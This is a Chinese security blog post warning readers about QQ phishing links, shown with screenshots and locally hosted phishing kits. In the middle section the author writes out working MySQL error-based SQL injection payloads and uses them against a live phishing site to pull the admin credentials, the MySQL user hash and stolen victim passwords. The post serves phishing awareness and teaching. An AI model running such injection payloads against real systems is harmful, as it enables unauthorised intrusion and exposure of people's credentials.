<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="你的QQ就是这样被盗的|防范网络钓鱼"><meta name="keywords" content="渗透测试,网络钓鱼"><meta name="author" content="Linuz"><meta name="copyright" content="Linuz"><title>你的QQ就是这样被盗的|防范网络钓鱼 | Linuz's Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.6.1"><link rel="dns-prefetch" href="https://cdn.staticfile.org"><link rel="dns-prefetch" href="https://cdn.bootcss.com"><link rel="dns-prefetch" href="https://creativecommons.org"><link rel="dns-prefetch" href="https://hm.baidu.com"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?23741e1e1b1e0d3c174cf092693a0773";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();</script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#起因"><span class="toc-number">2.</span> <span class="toc-text">起因</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#尝试攻击"><span class="toc-number">3.</span> <span class="toc-text">尝试攻击</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL注入漏洞"><span class="toc-number">4.</span> <span class="toc-text">SQL注入漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后续"><span class="toc-number">5.</span> <span class="toc-text">后续</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#科普时间"><span class="toc-number">6.</span> <span class="toc-text">科普时间</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#QQ空间钓鱼"><span class="toc-number">6.1.</span> <span class="toc-text">QQ空间钓鱼</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#游戏活动钓鱼"><span class="toc-number">6.2.</span> <span class="toc-text">游戏活动钓鱼</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#业务活动页面钓鱼"><span class="toc-number">6.3.</span> <span class="toc-text">业务活动页面钓鱼</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Linuz</div><div class="author-info__description text-center">天津某大学信息安全专业在读，突然有一天发现自己距离理想越来越远，所以想写个博客记录自己学习生活，希望能一直坚持下去。</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">15</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">9</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">6</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" href="https://www.liqixin.net">启鑫的黑板报</a><a class="author-info-links__name text-center" href="http://www.w22.xyz">w22</a><a class="author-info-links__name text-center" href="https://www.cnblogs.com/bmjoker">bmjoker</a><a class="author-info-links__name text-center" href="https://www.se7ensec.cn">Se7en</a><a class="author-info-links__name text-center" href="http://ctf.194nb.com">Aman CTF</a><a class="author-info-links__name text-center" href="https://www.vulnspy.com">VULNSPY</a><a class="author-info-links__name text-center" href="http://hackergu.com">HackerGu's blog</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://tva3.sinaimg.cn/large/007DFXDhgy1g5lhslc1hrj31hc0u0e81.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Linuz's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a><a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/gallery">Gallery</a><a class="site-page" href="/sponsors">Sponsors</a><a class="site-page" href="/about">About</a></span></div><div id="post-info"><div id="post-title">你的QQ就是这样被盗的|防范网络钓鱼</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2019-07-08</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/渗透测试/">渗透测试</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.2k</span><span class="post-meta__separator">|</span><span>阅读时长: 4 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>以前在qq上就收到过朋友发来的二维码链接啥的，一般的套路就是诱导你扫描这个二维码或者点击这个链接。<br>例如某天爱玩吃鸡的你收到一条链接，标题是点击领取金币领皮肤领…然后你兴奋的不行，点开之后让你输入账号密码登录，你看着这个页面，没有发现半点可疑的地方，然后就把账号密码随手输了进去。不一会儿，你的qq提示在其他地方登录，然后你列表的好友就都收到了你发给他们的链接。又比如某天，你收到一条消息/一条空间留言，内容是：这个人的qq空间里怎么有你的照片？又或者是：这个人是谁？为什么他空间有你俩的合影？单纯善良好奇心又巨强的你瞬间懵了，同学？我和谁合过影啊？都忘了，赶紧去看看。但是你点击以后是个qq空间的页面让你登录，合情合理啊，毕竟是qq空间相册，那就登录呗，然后你qq就掉线了。<br>本文没啥技术含量，因为这几天正好碰到一个钓鱼网站，结合着真实的钓鱼网站打算给朋友们科普一下，提高一下防范意识。  </p>
<h1 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h1><p>某个无聊的下午，正吃着西瓜刷着微博，突然收到一条QQ消息，吓得我赶紧放下了手中的西瓜…<br>是一个朋友发来的消息，内容如下：<br><img src="https://tva2.sinaimg.cn/large/007DFXDhgy1g4s5b20ueqj30jg0e8myh.jpg" alt><br>那就扫一下呗，二维码直接拿到电脑上扫了一下，得到一个短网址<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s5q096gwj30rl0agdft.jpg" alt><br>还原短网址得到一个链接<br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4s5qutvsdj31520fedg5.jpg" alt><br>然后我们直接访问这个链接，会先出现一个电脑管家安全检测的页面，最终会跳转到真实钓鱼网站的页面。不得不说，这个安全检测过程做的还有模有样的，这个过程会让人们更容易相信这是一个安全的网站，减少顾虑，从而增加成功的概率。(如果在手机qq里面长按二维码识别，然后跳转到钓鱼网站页面的过程是看不到网站域名的，最终只有一个qq空间登录页面。)<br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4s6gdq47vj321n0u0di8.jpg" alt><br>正常情况下，输入qq号码和密码后跳转到QQ空间黄钻活动页面。<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s6qqeplqj31hc0scab4.jpg" alt><br><img src="https://tva1.sinaimg.cn/large/007DFXDhgy1g4sjxauxykj31hc0scjtb.jpg" alt>  </p>
<h1 id="尝试攻击"><a href="#尝试攻击" class="headerlink" title="尝试攻击"></a>尝试攻击</h1><p>前两天在FreeBuf上看到一个大佬对这类钓鱼网站的源码做了代码审计(<a href="https://www.freebuf.com/column/207162.html" target="_blank" rel="noopener">传送门</a>)，正好拿这个网站练练手。无奈管理员登录界面根本找不到，猜了半天，最终发现有一个“后台”拼音缩写的目录，但是访问也跳转不到管理地址，又扫了一下，无果，遂放弃。<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s73og3yjj31040eaglv.jpg" alt>  </p>
<h1 id="SQL注入漏洞"><a href="#SQL注入漏洞" class="headerlink" title="SQL注入漏洞"></a>SQL注入漏洞</h1><p>在对传递参数进行测试的过程中，发现密码输入框处存在SQL注入漏洞。<br>正常输入：<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s7ep27jfj30xr0d8t9w.jpg" alt><br>传递单引号报错：<br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4sk6lanbmj31fv0jhgn3.jpg" alt><br>此处的查询语句应该是  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from qq where username=&apos;xxx&apos; and password=&apos;xxx&apos;;</span><br></pre></td></tr></table></figure>

<p>本来以为是Sqlmap一把梭的那种，结果跑一下就被waf封IP，那就手工呗。<br>报错注入，已知表名是qq，字段名是username,password<br>获取数据库名：  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (extractvalue(1,concat(0x7e,(select database()),0x7e)))#</span><br></pre></td></tr></table></figure>

<p><img src="https://tva2.sinaimg.cn/large/007DFXDhgy1g4uimkq8yvj31bx0e675r.jpg" alt><br>数据库名字为’db’，猜测管理员表名为admin，字段名同上  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (extractvalue(1,concat(0x7e,(select username from db.admin),0x7e)))#</span><br></pre></td></tr></table></figure>

<p>由于extractvalue()这几种报错注入的方法最多显示32位，所以可以用substring()分割一下  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (extractvalue(1,concat(0x7e,(substring((select password from db.admin),1,16 )),0x7e)))#</span><br></pre></td></tr></table></figure>

<p><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s865t25rj31es0frjsx.jpg" alt><br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4s8vui48sj31gc0cemyq.jpg" alt><br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4s8wmfu6qj31gf0c875u.jpg" alt><br>拿数据库的密码时用了另外一种方法  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (select 1 from (select count(*),concat(&apos;~&apos;,(select Password from mysql.user where host=&apos;127.0.0.1&apos; limit 0,1),&apos;~&apos;,floor(rand(0)*2)) as a from information_schema.tables group by a)b)#</span><br></pre></td></tr></table></figure>

<p><img src="https://tva2.sinaimg.cn/large/007DFXDhgy1g4s929b50aj31ge0dsjt7.jpg" alt><br>查受害者的账号密码  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&apos; and (extractvalue(1,concat(0x7e,(select username from db.qq where id=1),0x7e,(select password from db.qq where id=1),0x7e)))#</span><br></pre></td></tr></table></figure>

<p><img src="https://tva2.sinaimg.cn/large/007DFXDhgy1g4s96egdw7j31gf0e675z.jpg" alt><br>本来还想试试load_file()读个配置文件啥的，后来发现是高版本的mysql，凉凉~  </p>
<h1 id="后续"><a href="#后续" class="headerlink" title="后续"></a>后续</h1><p>你还想看后续？？？你们有啥想法和思路倒是可以交流一下~比如什么给他提交10万条假数据一类的…  </p>
<h1 id="科普时间"><a href="#科普时间" class="headerlink" title="科普时间"></a>科普时间</h1><p>收集了几个网上公开的钓鱼网站源码，然后在本地搭建了一下，给大家看下效果。  </p>
<h2 id="QQ空间钓鱼"><a href="#QQ空间钓鱼" class="headerlink" title="QQ空间钓鱼"></a>QQ空间钓鱼</h2><p>手机访问效果如下：<br>输入账号密码后跳转至真实的网站<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4sidekmc4j31hl0u0dil.jpg" alt><br>此时后台就拿到了你输入的内容<br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4siewcdmuj31hc0k43zx.jpg" alt></p>
<h2 id="游戏活动钓鱼"><a href="#游戏活动钓鱼" class="headerlink" title="游戏活动钓鱼"></a>游戏活动钓鱼</h2><p>访问效果<br><img src="https://tva4.sinaimg.cn/large/007DFXDhgy1g4sihch9o9j31hc0scwgc.jpg" alt><br><img src="https://tva2.sinaimg.cn/large/007DFXDhgy1g4siiayuw7j31hc0scjt5.jpg" alt><br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4sijqnxtnj31hc0izgnm.jpg" alt></p>
<h2 id="业务活动页面钓鱼"><a href="#业务活动页面钓鱼" class="headerlink" title="业务活动页面钓鱼"></a>业务活动页面钓鱼</h2><p><img src="https://tva1.sinaimg.cn/large/007DFXDhgy1g4sip813juj30ya0u0wi3.jpg" alt><br>后台收到账号信息<br><img src="https://tva1.sinaimg.cn/large/007DFXDhgy1g4siq4mpdbj31hc0l6wg9.jpg" alt><br>这个网站也是输入完账号密码跳转到真实的页面，我发现这个页面分毫不差，看对比图<br><img src="https://tva3.sinaimg.cn/large/007DFXDhgy1g4siust5ogj30ya0u079u.jpg" alt><br>如何辨别钓鱼网站？<a href="https://www.zhihu.com/question/35424623" target="_blank" rel="noopener">知乎链接</a></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Linuz</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://linuz.me/2019/07/08/Phishing-site/">https://linuz.me/2019/07/08/Phishing-site/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://linuz.me">Linuz's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/渗透测试/">渗透测试</a><a class="post-meta__tags" href="/tags/网络钓鱼/">网络钓鱼</a></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechat.png"><div class="post-qr-code__desc">敢不敢赏脸一次</div></div></div><div class="social-share"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2019/07/19/Docker-install/"><i class="fa fa-chevron-left">  </i><span>Docker安装指南</span></a></div><div class="next-post pull-right"><a href="/2019/06/21/Simple-reverse/"><span>逆向学习[1]一道入门题详解</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == true ? true : false;
var verify = 'false' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'kcuNqj04mCe8HJHF16XoaNNb-gzGzoHsz',
  appKey:'LfFqNQTPLqBx3ayKrDlfSHyn',
  placeholder:'(｡･∀･)ﾉﾞ这里是评论区~',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(https://tva3.sinaimg.cn/large/007DFXDhgy1g5lhslc1hrj31hc0u0e81.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2020 By Linuz</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>